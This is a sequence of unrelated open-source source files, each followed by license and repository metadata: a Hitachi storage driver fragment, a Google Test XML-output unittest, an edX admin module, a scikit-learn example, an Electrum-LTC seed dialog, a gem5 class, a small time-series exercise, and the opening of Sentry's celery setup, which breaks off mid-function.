def get_ldev_size_in_gigabyte(self, ldev, existing_ref):
param = 'unit_name'
if param not in existing_ref:
msg = basic_lib.output_err(700, param=param)
raise exception.HBSDError(data=msg)
storage = existing_ref.get(param)
if storage != self.conf.hitachi_unit_name:
msg = basic_lib.output_err(648, resource=param)
raise exception.HBSDError(data=msg)
try:
stdout = self._get_lu(ldev)
except exception.HBSDError:
with excutils.save_and_reraise_exception():
basic_lib.output_err(648, resource='LDEV')
lines = stdout.splitlines()
line = lines[2]
splits = shlex.split(line)
vol_type = splits[len(splits) - 1]
if basic_lib.NORMAL_VOLUME_TYPE != vol_type:
msg = basic_lib.output_err(702, ldev=ldev)
raise exception.HBSDError(data=msg)
dppool = splits[5]
if 'N/A' == dppool:
msg = basic_lib.output_err(702, ldev=ldev)
raise exception.HBSDError(data=msg)
# Hitachi storage calculates volume sizes in a block unit, 512 bytes.
# So, units.Gi is divided by 512.
size = int(splits[1])
if size % (units.Gi / 512):
msg = basic_lib.output_err(703, ldev=ldev)
raise exception.HBSDError(data=msg)
num_port = int(splits[len(splits) - 2])
if num_port:
msg = basic_lib.output_err(704, ldev=ldev)
raise exception.HBSDError(data=msg)
return size / (units.Gi / 512)
| apache-2.0 |
gitmogul/gmock | gtest/test/gtest_xml_output_unittest.py | 1815 | 14580 | #!/usr/bin/env python
#
# Copyright 2006, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Unit test for the gtest_xml_output module"""
__author__ = 'eefacm@gmail.com (Sean Mcafee)'
import datetime
import errno
import os
import re
import sys
from xml.dom import minidom, Node
import gtest_test_utils
import gtest_xml_test_utils
GTEST_FILTER_FLAG = '--gtest_filter'
GTEST_LIST_TESTS_FLAG = '--gtest_list_tests'
GTEST_OUTPUT_FLAG = "--gtest_output"
GTEST_DEFAULT_OUTPUT_FILE = "test_detail.xml"
GTEST_PROGRAM_NAME = "gtest_xml_output_unittest_"
SUPPORTS_STACK_TRACES = False
if SUPPORTS_STACK_TRACES:
STACK_TRACE_TEMPLATE = '\nStack trace:\n*'
else:
STACK_TRACE_TEMPLATE = ''
EXPECTED_NON_EMPTY_XML = """<?xml version="1.0" encoding="UTF-8"?>
<testsuites tests="23" failures="4" disabled="2" errors="0" time="*" timestamp="*" name="AllTests" ad_hoc_property="42">
<testsuite name="SuccessfulTest" tests="1" failures="0" disabled="0" errors="0" time="*">
<testcase name="Succeeds" status="run" time="*" classname="SuccessfulTest"/>
</testsuite>
<testsuite name="FailedTest" tests="1" failures="1" disabled="0" errors="0" time="*">
<testcase name="Fails" status="run" time="*" classname="FailedTest">
<failure message="gtest_xml_output_unittest_.cc:*
Value of: 2
Expected: 1" type=""><![CDATA[gtest_xml_output_unittest_.cc:*
Value of: 2
Expected: 1%(stack)s]]></failure>
</testcase>
</testsuite>
<testsuite name="MixedResultTest" tests="3" failures="1" disabled="1" errors="0" time="*">
<testcase name="Succeeds" status="run" time="*" classname="MixedResultTest"/>
<testcase name="Fails" status="run" time="*" classname="MixedResultTest">
<failure message="gtest_xml_output_unittest_.cc:*
Value of: 2
Expected: 1" type=""><![CDATA[gtest_xml_output_unittest_.cc:*
Value of: 2
Expected: 1%(stack)s]]></failure>
<failure message="gtest_xml_output_unittest_.cc:*
Value of: 3
Expected: 2" type=""><![CDATA[gtest_xml_output_unittest_.cc:*
Value of: 3
Expected: 2%(stack)s]]></failure>
</testcase>
<testcase name="DISABLED_test" status="notrun" time="*" classname="MixedResultTest"/>
</testsuite>
<testsuite name="XmlQuotingTest" tests="1" failures="1" disabled="0" errors="0" time="*">
<testcase name="OutputsCData" status="run" time="*" classname="XmlQuotingTest">
<failure message="gtest_xml_output_unittest_.cc:*
Failed
XML output: <?xml encoding="utf-8"><top><![CDATA[cdata text]]></top>" type=""><![CDATA[gtest_xml_output_unittest_.cc:*
Failed
XML output: <?xml encoding="utf-8"><top><![CDATA[cdata text]]>]]><![CDATA[</top>%(stack)s]]></failure>
</testcase>
</testsuite>
<testsuite name="InvalidCharactersTest" tests="1" failures="1" disabled="0" errors="0" time="*">
<testcase name="InvalidCharactersInMessage" status="run" time="*" classname="InvalidCharactersTest">
<failure message="gtest_xml_output_unittest_.cc:*
Failed
Invalid characters in brackets []" type=""><![CDATA[gtest_xml_output_unittest_.cc:*
Failed
Invalid characters in brackets []%(stack)s]]></failure>
</testcase>
</testsuite>
<testsuite name="DisabledTest" tests="1" failures="0" disabled="1" errors="0" time="*">
<testcase name="DISABLED_test_not_run" status="notrun" time="*" classname="DisabledTest"/>
</testsuite>
<testsuite name="PropertyRecordingTest" tests="4" failures="0" disabled="0" errors="0" time="*" SetUpTestCase="yes" TearDownTestCase="aye">
<testcase name="OneProperty" status="run" time="*" classname="PropertyRecordingTest" key_1="1"/>
<testcase name="IntValuedProperty" status="run" time="*" classname="PropertyRecordingTest" key_int="1"/>
<testcase name="ThreeProperties" status="run" time="*" classname="PropertyRecordingTest" key_1="1" key_2="2" key_3="3"/>
<testcase name="TwoValuesForOneKeyUsesLastValue" status="run" time="*" classname="PropertyRecordingTest" key_1="2"/>
</testsuite>
<testsuite name="NoFixtureTest" tests="3" failures="0" disabled="0" errors="0" time="*">
<testcase name="RecordProperty" status="run" time="*" classname="NoFixtureTest" key="1"/>
<testcase name="ExternalUtilityThatCallsRecordIntValuedProperty" status="run" time="*" classname="NoFixtureTest" key_for_utility_int="1"/>
<testcase name="ExternalUtilityThatCallsRecordStringValuedProperty" status="run" time="*" classname="NoFixtureTest" key_for_utility_string="1"/>
</testsuite>
<testsuite name="Single/ValueParamTest" tests="4" failures="0" disabled="0" errors="0" time="*">
<testcase name="HasValueParamAttribute/0" value_param="33" status="run" time="*" classname="Single/ValueParamTest" />
<testcase name="HasValueParamAttribute/1" value_param="42" status="run" time="*" classname="Single/ValueParamTest" />
<testcase name="AnotherTestThatHasValueParamAttribute/0" value_param="33" status="run" time="*" classname="Single/ValueParamTest" />
<testcase name="AnotherTestThatHasValueParamAttribute/1" value_param="42" status="run" time="*" classname="Single/ValueParamTest" />
</testsuite>
<testsuite name="TypedTest/0" tests="1" failures="0" disabled="0" errors="0" time="*">
<testcase name="HasTypeParamAttribute" type_param="*" status="run" time="*" classname="TypedTest/0" />
</testsuite>
<testsuite name="TypedTest/1" tests="1" failures="0" disabled="0" errors="0" time="*">
<testcase name="HasTypeParamAttribute" type_param="*" status="run" time="*" classname="TypedTest/1" />
</testsuite>
<testsuite name="Single/TypeParameterizedTestCase/0" tests="1" failures="0" disabled="0" errors="0" time="*">
<testcase name="HasTypeParamAttribute" type_param="*" status="run" time="*" classname="Single/TypeParameterizedTestCase/0" />
</testsuite>
<testsuite name="Single/TypeParameterizedTestCase/1" tests="1" failures="0" disabled="0" errors="0" time="*">
<testcase name="HasTypeParamAttribute" type_param="*" status="run" time="*" classname="Single/TypeParameterizedTestCase/1" />
</testsuite>
</testsuites>""" % {'stack': STACK_TRACE_TEMPLATE}
EXPECTED_FILTERED_TEST_XML = """<?xml version="1.0" encoding="UTF-8"?>
<testsuites tests="1" failures="0" disabled="0" errors="0" time="*"
timestamp="*" name="AllTests" ad_hoc_property="42">
<testsuite name="SuccessfulTest" tests="1" failures="0" disabled="0"
errors="0" time="*">
<testcase name="Succeeds" status="run" time="*" classname="SuccessfulTest"/>
</testsuite>
</testsuites>"""
EXPECTED_EMPTY_XML = """<?xml version="1.0" encoding="UTF-8"?>
<testsuites tests="0" failures="0" disabled="0" errors="0" time="*"
timestamp="*" name="AllTests">
</testsuites>"""
GTEST_PROGRAM_PATH = gtest_test_utils.GetTestExecutablePath(GTEST_PROGRAM_NAME)
SUPPORTS_TYPED_TESTS = 'TypedTest' in gtest_test_utils.Subprocess(
[GTEST_PROGRAM_PATH, GTEST_LIST_TESTS_FLAG], capture_stderr=False).output
class GTestXMLOutputUnitTest(gtest_xml_test_utils.GTestXMLTestCase):
"""
Unit test for Google Test's XML output functionality.
"""
# This test currently breaks on platforms that do not support typed and
# type-parameterized tests, so we don't run it under them.
if SUPPORTS_TYPED_TESTS:
def testNonEmptyXmlOutput(self):
"""
Runs a test program that generates a non-empty XML output, and
tests that the XML output is expected.
"""
self._TestXmlOutput(GTEST_PROGRAM_NAME, EXPECTED_NON_EMPTY_XML, 1)
def testEmptyXmlOutput(self):
"""Verifies XML output for a Google Test binary without actual tests.
Runs a test program that generates an empty XML output, and
tests that the XML output is expected.
"""
self._TestXmlOutput('gtest_no_test_unittest', EXPECTED_EMPTY_XML, 0)
def testTimestampValue(self):
"""Checks whether the timestamp attribute in the XML output is valid.
Runs a test program that generates an empty XML output, and checks if
the timestamp attribute in the testsuites tag is valid.
"""
actual = self._GetXmlOutput('gtest_no_test_unittest', [], 0)
date_time_str = actual.documentElement.getAttributeNode('timestamp').value
# datetime.strptime() is only available in Python 2.5+ so we have to
# parse the expected datetime manually.
match = re.match(r'(\d+)-(\d\d)-(\d\d)T(\d\d):(\d\d):(\d\d)', date_time_str)
self.assertTrue(
re.match,
'XML datettime string %s has incorrect format' % date_time_str)
date_time_from_xml = datetime.datetime(
year=int(match.group(1)), month=int(match.group(2)),
day=int(match.group(3)), hour=int(match.group(4)),
minute=int(match.group(5)), second=int(match.group(6)))
time_delta = abs(datetime.datetime.now() - date_time_from_xml)
# timestamp value should be near the current local time
self.assertTrue(time_delta < datetime.timedelta(seconds=600),
'time_delta is %s' % time_delta)
actual.unlink()
def testDefaultOutputFile(self):
"""
Confirms that Google Test produces an XML output file with the expected
default name if no name is explicitly specified.
"""
output_file = os.path.join(gtest_test_utils.GetTempDir(),
GTEST_DEFAULT_OUTPUT_FILE)
gtest_prog_path = gtest_test_utils.GetTestExecutablePath(
'gtest_no_test_unittest')
try:
os.remove(output_file)
except OSError, e:
if e.errno != errno.ENOENT:
raise
p = gtest_test_utils.Subprocess(
[gtest_prog_path, '%s=xml' % GTEST_OUTPUT_FLAG],
working_dir=gtest_test_utils.GetTempDir())
self.assert_(p.exited)
self.assertEquals(0, p.exit_code)
self.assert_(os.path.isfile(output_file))
def testSuppressedXmlOutput(self):
"""
Tests that no XML file is generated if the default XML listener is
shut down before RUN_ALL_TESTS is invoked.
"""
xml_path = os.path.join(gtest_test_utils.GetTempDir(),
GTEST_PROGRAM_NAME + 'out.xml')
if os.path.isfile(xml_path):
os.remove(xml_path)
command = [GTEST_PROGRAM_PATH,
'%s=xml:%s' % (GTEST_OUTPUT_FLAG, xml_path),
'--shut_down_xml']
p = gtest_test_utils.Subprocess(command)
if p.terminated_by_signal:
# p.signal is avalable only if p.terminated_by_signal is True.
self.assertFalse(
p.terminated_by_signal,
'%s was killed by signal %d' % (GTEST_PROGRAM_NAME, p.signal))
else:
self.assert_(p.exited)
self.assertEquals(1, p.exit_code,
"'%s' exited with code %s, which doesn't match "
'the expected exit code %s.'
% (command, p.exit_code, 1))
self.assert_(not os.path.isfile(xml_path))
def testFilteredTestXmlOutput(self):
"""Verifies XML output when a filter is applied.
Runs a test program that executes only some tests and verifies that
non-selected tests do not show up in the XML output.
"""
self._TestXmlOutput(GTEST_PROGRAM_NAME, EXPECTED_FILTERED_TEST_XML, 0,
extra_args=['%s=SuccessfulTest.*' % GTEST_FILTER_FLAG])
def _GetXmlOutput(self, gtest_prog_name, extra_args, expected_exit_code):
"""
Returns the xml output generated by running the program gtest_prog_name.
Furthermore, the program's exit code must be expected_exit_code.
"""
xml_path = os.path.join(gtest_test_utils.GetTempDir(),
gtest_prog_name + 'out.xml')
gtest_prog_path = gtest_test_utils.GetTestExecutablePath(gtest_prog_name)
command = ([gtest_prog_path, '%s=xml:%s' % (GTEST_OUTPUT_FLAG, xml_path)] +
extra_args)
p = gtest_test_utils.Subprocess(command)
if p.terminated_by_signal:
self.assert_(False,
'%s was killed by signal %d' % (gtest_prog_name, p.signal))
else:
self.assert_(p.exited)
self.assertEquals(expected_exit_code, p.exit_code,
"'%s' exited with code %s, which doesn't match "
'the expected exit code %s.'
% (command, p.exit_code, expected_exit_code))
actual = minidom.parse(xml_path)
return actual
def _TestXmlOutput(self, gtest_prog_name, expected_xml,
expected_exit_code, extra_args=None):
"""
Asserts that the XML document generated by running the program
gtest_prog_name matches expected_xml, a string containing another
XML document. Furthermore, the program's exit code must be
expected_exit_code.
"""
actual = self._GetXmlOutput(gtest_prog_name, extra_args or [],
expected_exit_code)
expected = minidom.parseString(expected_xml)
self.NormalizeXml(actual.documentElement)
self.AssertEquivalentNodes(expected.documentElement,
actual.documentElement)
expected.unlink()
actual.unlink()
if __name__ == '__main__':
os.environ['GTEST_STACK_TRACE_DEPTH'] = '1'
gtest_test_utils.Main()
| bsd-3-clause |
philanthropy-u/edx-platform | openedx/features/partners/admin.py | 1 | 1216 | from django.contrib import admin
from django.urls import reverse
from .models import Partner, PartnerCommunity, PartnerUser
class PartnerAdmin(admin.ModelAdmin):
"""
Django admin customizations for Partner model
"""
list_display = ('id', 'label', 'slug', 'partner_url')
readonly_fields = ('partner_url',)
def partner_url(self, obj):
if obj.slug:
return reverse('partner_url', kwargs={'slug': obj.slug})
class PartnerUserModelAdmin(admin.ModelAdmin):
"""
Django admin to verify if user is affiliated with partner or not after login or registration
"""
raw_id_fields = ('user',)
class PartnerCommunityModelAdmin(admin.ModelAdmin):
"""
Django admin model to add community id to partner so that every user is added automatically to that community
"""
list_display = ['id', 'partner', 'community_id']
search_fields = ('partner', 'community_id')
class Meta(object):
verbose_name = 'Partner Community'
verbose_name_plural = 'Partner Communities'
admin.site.register(Partner, PartnerAdmin)
admin.site.register(PartnerCommunity, PartnerCommunityModelAdmin)
admin.site.register(PartnerUser, PartnerUserModelAdmin)
| agpl-3.0 |
pypot/scikit-learn | examples/decomposition/plot_faces_decomposition.py | 204 | 4452 | """
============================
Faces dataset decompositions
============================
This example applies to :ref:`olivetti_faces` different unsupervised
matrix decomposition (dimension reduction) methods from the module
:py:mod:`sklearn.decomposition` (see the documentation chapter
:ref:`decompositions`) .
"""
print(__doc__)
# Authors: Vlad Niculae, Alexandre Gramfort
# License: BSD 3 clause
import logging
from time import time
from numpy.random import RandomState
import matplotlib.pyplot as plt
from sklearn.datasets import fetch_olivetti_faces
from sklearn.cluster import MiniBatchKMeans
from sklearn import decomposition
# Display progress logs on stdout
logging.basicConfig(level=logging.INFO,
format='%(asctime)s %(levelname)s %(message)s')
n_row, n_col = 2, 3
n_components = n_row * n_col
image_shape = (64, 64)
rng = RandomState(0)
###############################################################################
# Load faces data
dataset = fetch_olivetti_faces(shuffle=True, random_state=rng)
faces = dataset.data
n_samples, n_features = faces.shape
# global centering
faces_centered = faces - faces.mean(axis=0)
# local centering
faces_centered -= faces_centered.mean(axis=1).reshape(n_samples, -1)
print("Dataset consists of %d faces" % n_samples)
###############################################################################
def plot_gallery(title, images, n_col=n_col, n_row=n_row):
plt.figure(figsize=(2. * n_col, 2.26 * n_row))
plt.suptitle(title, size=16)
for i, comp in enumerate(images):
plt.subplot(n_row, n_col, i + 1)
vmax = max(comp.max(), -comp.min())
plt.imshow(comp.reshape(image_shape), cmap=plt.cm.gray,
interpolation='nearest',
vmin=-vmax, vmax=vmax)
plt.xticks(())
plt.yticks(())
plt.subplots_adjust(0.01, 0.05, 0.99, 0.93, 0.04, 0.)
###############################################################################
# List of the different estimators, whether to center and transpose the
# problem, and whether the transformer uses the clustering API.
estimators = [
('Eigenfaces - RandomizedPCA',
decomposition.RandomizedPCA(n_components=n_components, whiten=True),
True),
('Non-negative components - NMF',
decomposition.NMF(n_components=n_components, init='nndsvda', beta=5.0,
tol=5e-3, sparseness='components'),
False),
('Independent components - FastICA',
decomposition.FastICA(n_components=n_components, whiten=True),
True),
('Sparse comp. - MiniBatchSparsePCA',
decomposition.MiniBatchSparsePCA(n_components=n_components, alpha=0.8,
n_iter=100, batch_size=3,
random_state=rng),
True),
('MiniBatchDictionaryLearning',
decomposition.MiniBatchDictionaryLearning(n_components=15, alpha=0.1,
n_iter=50, batch_size=3,
random_state=rng),
True),
('Cluster centers - MiniBatchKMeans',
MiniBatchKMeans(n_clusters=n_components, tol=1e-3, batch_size=20,
max_iter=50, random_state=rng),
True),
('Factor Analysis components - FA',
decomposition.FactorAnalysis(n_components=n_components, max_iter=2),
True),
]
###############################################################################
# Plot a sample of the input data
plot_gallery("First centered Olivetti faces", faces_centered[:n_components])
###############################################################################
# Do the estimation and plot it
for name, estimator, center in estimators:
print("Extracting the top %d %s..." % (n_components, name))
t0 = time()
data = faces
if center:
data = faces_centered
estimator.fit(data)
train_time = (time() - t0)
print("done in %0.3fs" % train_time)
if hasattr(estimator, 'cluster_centers_'):
components_ = estimator.cluster_centers_
else:
components_ = estimator.components_
if hasattr(estimator, 'noise_variance_'):
plot_gallery("Pixelwise variance",
estimator.noise_variance_.reshape(1, -1), n_col=1,
n_row=1)
plot_gallery('%s - Train time %.1fs' % (name, train_time),
components_[:n_components])
plt.show()
| bsd-3-clause |
vialectrum/vialectrum | electrum_ltc/gui/qt/seed_dialog.py | 1 | 9848 | #!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2013 ecdsa@github
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from PyQt5.QtCore import Qt
from PyQt5.QtGui import QPixmap
from PyQt5.QtWidgets import (QVBoxLayout, QCheckBox, QHBoxLayout, QLineEdit,
QLabel, QCompleter, QDialog, QStyledItemDelegate)
from electrum_ltc.i18n import _
from electrum_ltc.mnemonic import Mnemonic, seed_type
from electrum_ltc import old_mnemonic
from .util import (Buttons, OkButton, WWLabel, ButtonsTextEdit, icon_path,
EnterButton, CloseButton, WindowModalDialog, ColorScheme)
from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit
from .completion_text_edit import CompletionTextEdit
def seed_warning_msg(seed):
return ''.join([
"<p>",
_("Please save these {0} words on paper (order is important). "),
_("This seed will allow you to recover your wallet in case "
"of computer failure."),
"</p>",
"<b>" + _("WARNING") + ":</b>",
"<ul>",
"<li>" + _("Never disclose your seed.") + "</li>",
"<li>" + _("Never type it on a website.") + "</li>",
"<li>" + _("Do not store it electronically.") + "</li>",
"</ul>"
]).format(len(seed.split()))
class SeedLayout(QVBoxLayout):
def seed_options(self):
dialog = QDialog()
vbox = QVBoxLayout(dialog)
if 'ext' in self.options:
cb_ext = QCheckBox(_('Extend this seed with custom words'))
cb_ext.setChecked(self.is_ext)
vbox.addWidget(cb_ext)
if 'bip39' in self.options:
def f(b):
self.is_seed = (lambda x: bool(x)) if b else self.saved_is_seed
self.is_bip39 = b
self.on_edit()
if b:
msg = ' '.join([
'<b>' + _('Warning') + ':</b> ',
_('BIP39 seeds can be imported in Electrum, so that users can access funds locked in other wallets.'),
_('However, we do not generate BIP39 seeds, because they do not meet our safety standard.'),
_('BIP39 seeds do not include a version number, which compromises compatibility with future software.'),
_('We do not guarantee that BIP39 imports will always be supported in Electrum.'),
])
else:
msg = ''
self.seed_warning.setText(msg)
cb_bip39 = QCheckBox(_('BIP39 seed'))
cb_bip39.toggled.connect(f)
cb_bip39.setChecked(self.is_bip39)
vbox.addWidget(cb_bip39)
vbox.addLayout(Buttons(OkButton(dialog)))
if not dialog.exec_():
return None
self.is_ext = cb_ext.isChecked() if 'ext' in self.options else False
self.is_bip39 = cb_bip39.isChecked() if 'bip39' in self.options else False
def __init__(self, seed=None, title=None, icon=True, msg=None, options=None,
is_seed=None, passphrase=None, parent=None, for_seed_words=True):
QVBoxLayout.__init__(self)
self.parent = parent
self.options = options
if title:
self.addWidget(WWLabel(title))
if seed: # "read only", we already have the text
if for_seed_words:
self.seed_e = ButtonsTextEdit()
else: # e.g. xpub
self.seed_e = ShowQRTextEdit()
self.seed_e.setReadOnly(True)
self.seed_e.setText(seed)
else: # we expect user to enter text
assert for_seed_words
self.seed_e = CompletionTextEdit()
self.seed_e.setTabChangesFocus(False) # so that tab auto-completes
self.is_seed = is_seed
self.saved_is_seed = self.is_seed
self.seed_e.textChanged.connect(self.on_edit)
self.initialize_completer()
self.seed_e.setMaximumHeight(75)
hbox = QHBoxLayout()
if icon:
logo = QLabel()
logo.setPixmap(QPixmap(icon_path("seed.png"))
.scaledToWidth(64, mode=Qt.SmoothTransformation))
logo.setMaximumWidth(60)
hbox.addWidget(logo)
hbox.addWidget(self.seed_e)
self.addLayout(hbox)
hbox = QHBoxLayout()
hbox.addStretch(1)
self.seed_type_label = QLabel('')
hbox.addWidget(self.seed_type_label)
# options
self.is_bip39 = False
self.is_ext = False
if options:
opt_button = EnterButton(_('Options'), self.seed_options)
hbox.addWidget(opt_button)
self.addLayout(hbox)
if passphrase:
hbox = QHBoxLayout()
passphrase_e = QLineEdit()
passphrase_e.setText(passphrase)
passphrase_e.setReadOnly(True)
hbox.addWidget(QLabel(_("Your seed extension is") + ':'))
hbox.addWidget(passphrase_e)
self.addLayout(hbox)
self.addStretch(1)
self.seed_warning = WWLabel('')
if msg:
self.seed_warning.setText(seed_warning_msg(seed))
self.addWidget(self.seed_warning)
def initialize_completer(self):
bip39_english_list = Mnemonic('en').wordlist
old_list = old_mnemonic.wordlist
only_old_list = set(old_list) - set(bip39_english_list)
self.wordlist = list(bip39_english_list) + list(only_old_list) # concat both lists
self.wordlist.sort()
class CompleterDelegate(QStyledItemDelegate):
def initStyleOption(self, option, index):
super().initStyleOption(option, index)
# Some people complained that due to merging the two word lists,
# it is difficult to restore from a metal backup, as they planned
# to rely on the "4 letter prefixes are unique in bip39 word list" property.
# So we color words that are only in old list.
if option.text in only_old_list:
# yellow bg looks ~ok on both light/dark theme, regardless if (un)selected
option.backgroundBrush = ColorScheme.YELLOW.as_color(background=True)
self.completer = QCompleter(self.wordlist)
delegate = CompleterDelegate(self.seed_e)
self.completer.popup().setItemDelegate(delegate)
self.seed_e.set_completer(self.completer)
def get_seed(self):
text = self.seed_e.text()
return ' '.join(text.split())
def on_edit(self):
s = self.get_seed()
b = self.is_seed(s)
if not self.is_bip39:
t = seed_type(s)
label = _('Seed Type') + ': ' + t if t else ''
else:
from electrum_ltc.keystore import bip39_is_checksum_valid
is_checksum, is_wordlist = bip39_is_checksum_valid(s)
status = ('checksum: ' + ('ok' if is_checksum else 'failed')) if is_wordlist else 'unknown wordlist'
label = 'BIP39' + ' (%s)'%status
self.seed_type_label.setText(label)
self.parent.next_button.setEnabled(b)
# disable suggestions if user already typed an unknown word
for word in self.get_seed().split(" ")[:-1]:
if word not in self.wordlist:
self.seed_e.disable_suggestions()
return
self.seed_e.enable_suggestions()
class KeysLayout(QVBoxLayout):
def __init__(self, parent=None, header_layout=None, is_valid=None, allow_multi=False):
QVBoxLayout.__init__(self)
self.parent = parent
self.is_valid = is_valid
self.text_e = ScanQRTextEdit(allow_multi=allow_multi)
self.text_e.textChanged.connect(self.on_edit)
if isinstance(header_layout, str):
self.addWidget(WWLabel(header_layout))
else:
self.addLayout(header_layout)
self.addWidget(self.text_e)
def get_text(self):
return self.text_e.text()
def on_edit(self):
valid = False
try:
valid = self.is_valid(self.get_text())
except Exception as e:
self.parent.next_button.setToolTip(f'{_("Error")}: {str(e)}')
else:
self.parent.next_button.setToolTip('')
self.parent.next_button.setEnabled(valid)
class SeedDialog(WindowModalDialog):
def __init__(self, parent, seed, passphrase):
WindowModalDialog.__init__(self, parent, ('Vialectrum - ' + _('Seed')))
self.setMinimumWidth(400)
vbox = QVBoxLayout(self)
title = _("Your wallet generation seed is:")
slayout = SeedLayout(title=title, seed=seed, msg=True, passphrase=passphrase)
vbox.addLayout(slayout)
vbox.addLayout(Buttons(CloseButton(self)))
| mit |
BIT-SYS/gem5-spm-module | src/mem/slicc/symbols/RequestType.py | 83 | 1704 | # Copyright (c) 2010 Advanced Micro Devices, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from slicc.symbols.Symbol import Symbol
class RequestType(Symbol):
def __repr__(self):
return "[RequestType: %s]" % self.ident
__all__ = [ "RequestType" ]
| bsd-3-clause |
hahnicity/ace | chapter1/problem3.py | 1 | 1222 | """
Problem 3.
calculate the time series
yt = 5 + .05 * t + Et (Where E is epsilon)
for years 1960, 1961, ..., 2001 assuming Et independently and
identically distributed with mean 0 and sigma 0.2.
"""
from random import uniform
from matplotlib.pyplot import plot, show
from numpy import array, polyfit, poly1d
def create_distribution(size):
"""
Create a distribution, identically distributed, with mean 0 and
sigma 0.2
"""
# Shit it's way easier to just do some uniform distribution
# This is a bit over my head, and not possible for me without
# pen and paper
return array([uniform(-0.2, .2) for _ in xrange(size)])
def create_time_series(start_year, end_year):
"""
Create the time series, yt, then perform a regress on yt, plot yt and the
its trendline
"""
t_array = array(range(start_year, end_year + 1))
epsilon_t = create_distribution(len(t_array))
yt = array([5 + .05 * t_i + epsilon_t[i] for i, t_i in enumerate(t_array)])
fit = polyfit(t_array, yt, 1)
fit_func = poly1d(fit)
plot(t_array, yt, "yo", t_array, fit_func(t_array), "--k")
show()
def main():
create_time_series(1960, 2001)
if __name__ == "__main__":
main()
| unlicense |
jean/sentry | src/sentry/celery.py | 4 | 2377 | from __future__ import absolute_import
from django.conf import settings
from celery import Celery
from celery.app.task import Task
from sentry.utils import metrics
DB_SHARED_THREAD = """\
DatabaseWrapper objects created in a thread can only \
be used in that same thread. The object with alias '%s' \
was created in thread id %s and this is thread id %s.\
"""
def patch_thread_ident():
# monkey patch django.
# This patch make sure that we use real threads to get the ident which
# is going to happen if we are using gevent or eventlet.
# -- patch taken from gunicorn
if getattr(patch_thread_ident, 'called', False):
return
try:
from django.db.backends import BaseDatabaseWrapper, DatabaseError
if 'validate_thread_sharing' in BaseDatabaseWrapper.__dict__:
from six.moves import _thread as thread
_get_ident = thread.get_ident
__old__init__ = BaseDatabaseWrapper.__init__
def _init(self, *args, **kwargs):
__old__init__(self, *args, **kwargs)
self._thread_ident = _get_ident()
def _validate_thread_sharing(self):
if (not self.allow_thread_sharing and self._thread_ident != _get_ident()):
raise DatabaseError(
DB_SHARED_THREAD % (self.alias, self._thread_ident, _get_ident()),
)
